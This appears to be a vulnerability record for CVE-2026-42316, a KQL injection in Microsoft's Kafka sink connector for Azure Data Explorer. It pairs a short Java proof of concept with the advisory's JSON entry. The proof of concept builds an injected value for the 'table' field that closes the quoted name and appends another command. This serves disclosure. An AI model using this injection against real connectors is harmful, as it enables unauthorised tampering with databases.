CVE-2026-42316

// PoC: Malicious configuration payload for CVE-2026-42316 // This demonstrates how to inject a KQL command into the 'table' field. public class KqlInjectionPoc { public static void main(String[] args) { // 1. The vulnerable configuration field (e.g., 'table') // Input containing KQL metacharacters to break out of the string String maliciousTableInput = "my_table' | take 10 ; //"; // 2. Simulating the vulnerable String.formatted() logic found in the plugin // Original command pattern: .show table <table> ingestion json mapping '<mapping>' String formatPattern = ".show table %s ingestion json mapping 'default_mapping'"; // 3. Constructing the malicious command String exploitedCommand = String.format(formatPattern, maliciousTableInput); // 4. Output the resulting KQL command // Result: .show table my_table' | take 10 ; // ingestion json mapping 'default_mapping' // The ' closes the table name, allowing execution of ' | take 10' System.out.println("Generated Malicious KQL Command:"); System.out.println(exploitedCommand); } }

{"cve": {"id": "CVE-2026-42316", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:35.400", "lastModified": "2026-05-13T16:53:33.310", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "kafka-sink-azure-kusto Kafka Connect plugin is the official Microsoft sink for Azure Data Explorer (Kusto). Prior to 5.2.3, kafka-sink-azure-kusto did not sanitize user-controlled values inside the kusto.tables.topics.mapping configuration. The db, table, mapping, and format fields of each mapping entry were interpolated directly into KQL management/query commands via String.formatted(...) (e.g., FETCH_TABLE_COMMAND.formatted(table) → \"<table> | count\", FETCH_TABLE_MAPPING_COMMAND.formatted(table, format, mapping) → \".show table <table> ingestion <format> mapping '<mapping>'\"). An actor able to influence the connector configuration (for example, someone with permissions to submit or edit Kafka Connect connector configs) could embed KQL metacharacters (;, |, ') to execute arbitrary management commands in the context of the connector's service principal — enabling schema enumeration/modification, ingestion-mapping tampering, or changes to streaming/retention policies on the target Azure Data Explorer database. This is a tampering vulnerability. Exploitation requires privileged access to the connector configuration; no end-user interaction or Kafka record payload is involved. This vulnerability is fixed in 5.2.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-943"}]}], "references": [{"url": "https://github.com/Azure/kafka-sink-azure-kusto/pull/155", "source": "[email protected]"}, {"url": "https://github.com/Azure/kafka-sink-azure-kusto/releases/tag/v5.2.3", "source": "[email protected]"}, {"url": "https://github.com/Azure/kafka-sink-azure-kusto/security/advisories/GHSA-c9mr-mqvh-6wgj", "source": "[email protected]"}]}}